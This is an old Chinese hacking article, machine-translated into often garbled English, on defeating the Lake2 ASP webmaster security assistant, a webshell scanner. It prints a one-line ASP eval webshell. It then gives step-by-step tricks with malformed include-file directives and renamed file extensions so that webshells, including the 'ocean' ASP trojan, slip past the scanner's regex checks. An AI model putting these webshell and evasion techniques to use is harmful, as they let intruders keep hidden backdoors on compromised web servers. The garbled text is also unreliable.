Again break ray client figure ASP webmaster Safety assistant-vulnerability warning-the black bar safety net

ID MYHACK58:62200613019
Type myhack58
Reporter 佚名
Modified 2006-11-26T00:00:00


Lake2 last in the evil eighth fight, even to put yourself to create the Black anti-ultimatefree killASP Trojan with his ray client figure ASP webmasters security aides tear-kill some, and ultimately of course I win it, the result of course is to successfully“marry”got Lake2 a ASP Trojan, however, since the Lake2 shows ray client figure ASP webmaster Safety assistant 1. 5 edition of the post, the coupling of the horse on the glorious sacrifice. Is the so-called Old not go, New not come. Black anti the the ASP Trojanfree killthe study of a letter V. The us, to successfully get the word resurrection, we use the“S../”folder and Windows 2 0 0 3 The establishment Haha. asp folder to the success of let the ocean of the resurrection, we are using the COPY method, the images put on the ASP Trojan of the head. Are feeling is not too perfect. The last build of the Black anti-ultimatefree killASP Trojan is also killed, the word Trojan of use is also imperfect, really unhappy. Today, I once again to break ray client figure ASP webmaster Safety assistant, and create easier to use the ASP Trojan. To Lake2 website and 1. 5 the source code, found this version indeed improved a lot, and increase the killing function: 1:killing by the Unicode encoding of the ASP Trojan 2:killing the use(Open|Create)TextFile, And SaveToFile, Save, set Server, Server. (Transfer|Execute), the ShellExecute, Exec, the Run method of the file 3:change the original to the FSO method OpenTextFile to open the file, now to use ADODB. Stream the other side of the law in an open way open The program adds these three functions, killing the Trojan ability is greatly enhanced, to break through the past, with difficulty! Wonder not, the Lake2 said on its website that can almost kill all the ASP Trojan. Today we'll look at how to break it. When I read the webmaster helper code, noticed such a problem:the ASP webmaster Safety assistant using a lot of regex, for regular expressions, my personal opinion is:if the match is good, to break through is not easy;but if the match is not good, we can easily breakthrough, a powerful system will also become unsafe. In breakthrough it before, we first look at the regular expressions basic syntax. * Matches the preceding subexpression zero or more times. For example, zo can match "z" and "zoo" is. * Equivalent to{0, A}. The \s match any blank characters, including spaces, tabs, feed character, etc. Equivalent to [ \f\n\r\t\v]. . Matching except newline \n than any single character. To match., the Please use a. If we use”\s”and””a combination of”\s”, The final will match 0 or more spaces, tabs, feed character, etc. If we use the”.” With””combination”.” Will match 0 or more in addition to the newline with the characters. With this Knowledge, let us look at its code. In admin_scanwebshell. asp, the following code: 'Check include file with" Set regEx = New RegExp //build regular expression object regEx. IgnoreCase = True //ignore case regEx. Global = True //set to global match regEx. Pattern = "<!--\ s#include\sfile\s=\s"."" //Mode Set Matches = regEx. Execute(filetxt) //use a regular expression pattern in string filetxt run the lookup, and returns the search results to an array, if the exec method does not find a match, then it returns null For Each Match in Matches tFile = Replace(Mid(Match. Value, Instr(Match. Value,""") + 1, Len(Match. Value) - Instr(Match. Value, """) - 1),"/","\") //Find and replace work If Not CheckExt(FSOs. GetExtensionName(tFile)) Then //if it belongs to by checking the suffix of the name, the next step of killing the job Call ScanFile( Mid(FilePath, A 1, InStrRev(FilePath,"\"))&tFile, replace(FilePath, server. MapPath("\")&"\","",1,1,1) ) //call the file for killing SumFiles = SumFiles + 1 End If (Note:in another file with almost the same function, just put the above function in double quotes replaced by single quotes) Below, we together to analyze the program execution process, in here, if we use”<!--# include file="1.txt"-->”. Accordance with the procedures set the regular expression pattern regEx. Pattern = "<!--\ s#include\sfile\s=\s".*"" In filetxt lookup, and returns the search results to an array, because our string:<!--# include file="1.txt"-->and set the regular expression pattern matches, it returns the lookup result to an array. Then find and replace and search and kill operation, if we can construct a string, so it is not compatible with this mode, it will return NULL, it will not kill us, the ASP of the horse, let's experiment: The first step: 1:新建一个文件ttfct.txt its content is:<%eval request(“go”)%>. 2:Create a new file nokill. asp, the contents of<!--# include file=”ttfct.txt”--> With Ray client figure ASP webmaster Safety assistant 1. 5 for the search.

With the Lake2 of the sentence the customer service end of the connection, the display normal. The second step: Modify the nokill. asp, to make the contents of the<!--# include file=”ttfct. t”ss”xt” - >, and connected again.

Do not know if you noticed this sentence there is no: Active Server Pages, ASP 0 1 2 6 (0x80004005), could not find include file 'ttfct. t'./ ttfct/nokill. asp, line 1 Why we are here, only ttfct. t, then xt could be eating? Indeed, xt is to be eaten, because they were truncated. Then we put xt Supplement, its content becomes: <!--# include file=”ttfct.txt”ss”xt” - > again submitted, the result is successful, the display effect and the second the same. Take we now construct the statement: <!--# include file=”ttfct.txt”ss”xt” - >and the regEx. Pattern = "<!--\ s#include\sfile\s=\s".*"" For matching, we found no, our statement has 4 quotation marks, and this matches the statement only the two quotation marks, of course, the match will not succeed. Following the killing of the results proved my analysis. “Include file=”back can be added to the string, then, both sides can not, to this end, we modified the content to "ttfct"<!--# include file="ttfct.txt"-->"the same can successfully connect and break ray client figure ASP webmaster Safety assistant, we then construct: <!--# include file=ttfct. txt - >(note:ttfct. txt on both sides without quotation marks), so that you can be successful let us remark Trojans long to live. The word Trojan start back to raw, using the same method we can let the ocean ASP Trojan dodged it the killing, the specific method is 把 海洋 ASP 木马 的 后缀 改为 .dll the. hack, whatever you want, all any play, change your name all you can:). Then we create a new file named hy. asp, the code<!--# include file="hy.dll”stssst" - >put in, by accessing hy. asp also called a marine. Summary:In addition to the ASP language understanding, we also want to through practice, thus, the only real towards the door of success. If you're on thefree to killthere are better ways, welcome to communicate with me, my ID is TTFCT.